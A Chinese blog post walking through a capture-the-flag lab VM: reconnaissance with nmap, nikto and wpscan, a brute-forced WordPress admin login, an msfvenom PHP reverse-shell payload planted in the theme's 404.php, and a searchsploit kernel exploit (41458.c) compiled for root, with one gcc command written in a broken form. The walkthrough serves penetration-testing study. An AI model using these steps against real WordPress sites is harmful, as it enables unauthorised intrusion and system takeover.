CTF靶场内核漏洞提权 夜车星繁的博客

最新推荐文章于 2024-04-23 18:02:00 发布
最新推荐文章于 2024-04-23 18:02:00 发布
阅读量959 收藏
点赞数 1
分类专栏: ctf 靶场渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44740377/article/details/105175958
版权

许久没有执笔写博客,而今大脑劳累了两个月后,仿佛再次打破从前自己的思想空间,很久之前曾拥有的某些关于人生规划的想法现在我已经看得到它的模糊影子,这标志着我现在有一个真实存在的远方去跋涉。

        前几天注册了hackthebox后一筹莫展,最终选择做一下一年前就该去做的靶机热热身为接下来做vulnhub上更难的靶场做做准备。

VMWARE虚拟机下搭建环境:

攻击机kali IP:192.168.223.136  

攻击机win10:本机

靶   机IP:192.168.223.141

首先进行信息收集:

nmap -sV 192.168.223.141

 更详细的信息:

nmap -T4 -A -v192.168.223.141

以上我们得知系统类型,Apache版本、所开放服务端口等重要信息

除用nmap探测外,我们也可用nikto、dirb探测靶场信息

nikto扫描发现重要路径信息:

Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)

尝试访问扫描到的路径:192.168.223.141/wordpress

发现一些搜索框,下方有一个登录框,可以用来登入系统,这个稍后会用到,除此之外没什么可利用的信息,我们接下来要借助工具wpscan扫描这个CMS进一步探测信息:

wpscan --url http://192.168.223.141/wordpress --enumerate at --enumerate ap --enumerate u

此条命令会列出扫描到的WordPress主题、插件、用户名等信息:

扫描到用户名*2;主题:twentyfourteen;登录框可以暴力破解,

我们记住这个扫描出的地址:http://192.168.223.141/wordpress/wp-content/themes/twentyfourteen/

扫描结果来看可以看到这儿有个可利用漏洞

此时我们点击192.168.223.141/wordpress目录下的log in进入登录页面

此时可以通过暴力破解、SQL注入进入系统:

我们选择暴力破解,得到用户名密码:admin/admin

登录后界面如图所示

此时kali攻击机启动metasploit,并启动监听:

新开终端使用命令:msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.136 lport=4444 -f raw

生成我们的shell:

寻找到404.php在appearance下的editor页面:

复制并上传至404页面(将此代码上传至appearance下的editor界面):

 

访问URL:http://192.168.223.141/wordpress/wp-content/themes/twentyfourteen/404.php触发shell:

进入到系统

使用sysinfo命令得到服务器版本:ubuntu4.4.0

回到kali攻击机,搜索ubuntu4.4.0漏洞:

searchsploit ubuntu 4.4.0

我们用高亮区域漏洞提权,

cd /usr/share/exploitdb/exploits/linux/local/    复制目录下41458.c文件到root目录下然后编译此文件:

gcc -o 41458.c shellroot

编译完成后上传到靶机:

此时无法运行此文件,我们需要对shellroot进行提权,而我们的meterpreter没有chmod这条命令;

此时我们输入shell在其环境下执行:

chmod 777 shellroot

此时运用命令./shellroot

获得root权限:

至此此靶机渗透获取root权限成功。

夜车星繁
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
15.CTF-web安全
woo233的博客
09-29 1839
往往我们能拿下服务器的web服务只是具有低限用户(www-data),对于内网渗透,我们需要到root。Linux系统的过程不止涉及到了漏洞,也涉及了很多系统配置。:已经拿到低shell被入侵的机器上面有nc,python,perl等linux非常常见的工具有限上传文件和下载文件。
完成ubuntu-ctf靶机渗透 最终得到shell
m0_60319766的博客
02-17 4193
完成ubuntu-ctf靶机渗透 最终得到shell
linux系统
最新发布
weixin_53639243的博客
04-23 869
uname -a 显示全部系统信息cat /etc/issue 内核信息。此命令也适用于所有的Linux发行版cat /etc/passwd 所有人都可看//aux都是参数a = show processes for all users 显示所有用户的进程u = display the process's user/owner 显示用户x = also show processes not attached to a terminal 显示无控制终端的进程。
Admx_new靶机之BurpSuite内容替换、MSF漏洞利用、Wordpress后台漏洞利用、蚁剑上线、利用MySQL
qq_40898302的博客
05-12 529
1) Ctrl + Z 将shell放置后台 2) 输入 stty raw -echo 3) 输入 fg 将后台进程调用到前台 4) 关闭所有程序 5) 确定kali有bash ls /bin/bash 6) 将 zsh 改成 bsh sudo chsh -s /bin/bash 7) 重启 8) 输入 echo $SHELL 显示 /bin/bash 成功 9) 重新监听。有的系统漏洞只能触发一次,所以打点成功,基于这个shell获取更多的shell,利用多种方式,多种途径去获得更多的shell。
CTF综合靶场渗透系列-Billu_b0x
lza20001103的博客
10-11 3754
CTF综合靶场渗透系列-Billu_b0x
CTF-
su__xiaoyan的博客
01-06 2016
通过Web服务拿下服务器的基础限以后(www-data),如何值最高的系统限(root)。 的前条件: 获取服务器的基础限。 能上传或者下载文件。 靶机上面有常见工具或者环境,例如nc,python或者Perl。 Linux操作系统方法: 利用内核漏洞进行 利用错误的系统配置进行 明文密码 计划任务 密码复用 内核漏洞 首先查看系统Linux的发行版本: cat /etc/issue cat /etc/*-release 查看内核版本
计算机网络安全技术:在线CTF靶场.pdf
05-12
计算机网络安全技术,特别是在线CTF(Capture The Flag)靶场,是网络安全专业人员升技能和实战经验的重要途径。CTF源自1996年的DEFCON全球黑大会,它摒弃了早期黑间实际攻击的竞技方式,转为更加安全、有序的...
web-渗透-文件上传漏洞专题靶场.rar
03-14
靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
为新手快速入门CTF-Web开发的一款把靶场.zip
01-16
靶场,是指为信息安全人员供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和高安全专业人员技能的重要平台。 首先,...
cypherpunks-ctf:Cypherpunks CTF 智能合约漏洞攻击
05-14
Cypherpunks CTF Cypherpunks CTF是一款基于Web3 / 的战争游戏,灵感来自 ,该游戏将在以太坊虚拟机中进行播放。 每个级别都是一个需要被“破解”的智能合约。 欢迎等级PR! 在本地运行 安装所有软件包 ...
CTF:信息泄露.(CTFHub靶场环境)
网络安全领域___专研者.
07-31 3017
“ 信息泄露 ” 是指网站无意间向用户泄露敏感信息,泄露了有关于其他用户的数据,例如:另一个用户名的财务信息,敏感的商业 或 商业数据 ,还有一些有关网站及其基础架构的技术细节 等泄露信息。泄露敏感的用户或业务数据的危险相当明显,但是泄露技术信息有时可能同样严重,尽管某些信息用途有限,但它可能是暴露其他攻击面的起点,其中可能包含其他的漏洞
CTF图文讲解-smb渗透测试
weixin_45441727的博客
03-08 1168
扫描靶机 发现靶机172.16.101.38 对靶机进行开发=放端口及版本号扫描,获取有用的信息。 发现22(ssh),80(http),445和139(smb),3306(mysql) 首先我们讲一下什么是SMB协议 SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。
CTF夺旗训练课程
热门推荐
taozijun的博客
09-04 1万+
第一章 课程介绍与环境搭建 1-2 环境搭建 攻击机统一为kali,直接用ova文件创建靶场机器后,靶场机器要求进行登陆。 可我们并没有用户名和密码。问题是:如果我们不进行登陆,如何获得靶场机器的ip地址?从而达到联通靶场机器的目的. 这里我们使用netdiscover命令 netdiscover -r ip/子网掩码    24为24位二进制数1,就是255.255.255.0。...
墨者靶场 WordPress插件漏洞分析溯源
永远是少年
12-30 1461
今天继续给大家介绍CTF刷题,本文主要内容墨者靶场 WordPress插件漏洞分析溯源。 一、题目简介 二、解题实战
红队打靶:LampSecurity:CTF4打靶思路详解(vulnhub)
Bossfrank的博客
06-19 1523
本文对vulnhub中靶机LampSecurity:CTF4进行了打靶。核心步骤就是发现数据库查询参数->使用sqlmap进行注入->拿到用户名和密码->ssh登录,由于靶机较为老旧,现在我们可以使用许多自动化脚本工具进行渗透,但核心还是要了解渗透的思路和各种针对漏洞的脚本编写原理,而非单纯的使用工具。
CTF-Forge HackTheBox渗透测试(四)
ALLEN'Blog
03-28 301
Forge是一个CTFLinux盒子,在HackTheBox平台的难度范围内被评为“中等”。该靶场内容涵盖了子域枚举、SSRF攻击和用于特升级的python脚本的逆向工程。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking。
红队打靶:LampSecurity:CTF5打靶思路详解(vulnhub)
Bossfrank的博客
06-20 979
本文是vulnhub靶机LampSecurity:CTF5的打靶思路详解,涉及的知识点包括到关于NanoCMS凭据泄露漏洞利用、历史记录凭据搜索等。靶机不难,但在寻找cms后台登录和的过程需要经验。
红队打靶:LampSecurity:CTF7打靶思路详解(vulnhub)
Bossfrank的博客
06-21 1366
本文详述了vulnhub靶场LampSecurity:CTF7的详细打靶过程。打靶过程涉及到关于SQL注入、不安全的文件上传、awk字符串处理、md5哈希批量破解,密码喷射等。
DC-3渗透笔记
现代鲁滨逊的博客
03-13 199
1. 开启虚拟机的时候有可能会遇到这样的问题,按照示做就能解决问题 2. 发现主机192.168.174.148 3. nmap进行端口扫描,只开放了80端口,但可以看到使用了joomla 3. 访问站点,这次就只有一个flag,很明显只有获得root限才能得到flag 4. 准备用...
CTF windows
09-06
对于Windows系统的CTF(Capture The Flag)比赛中,常见的方式有以下几种: 1. 弱口令:尝试使用常见的弱口令对系统中的用户账户进行登录,如果成功登录则获取管理员限。 2. 利用漏洞:搜索系统中已知的漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值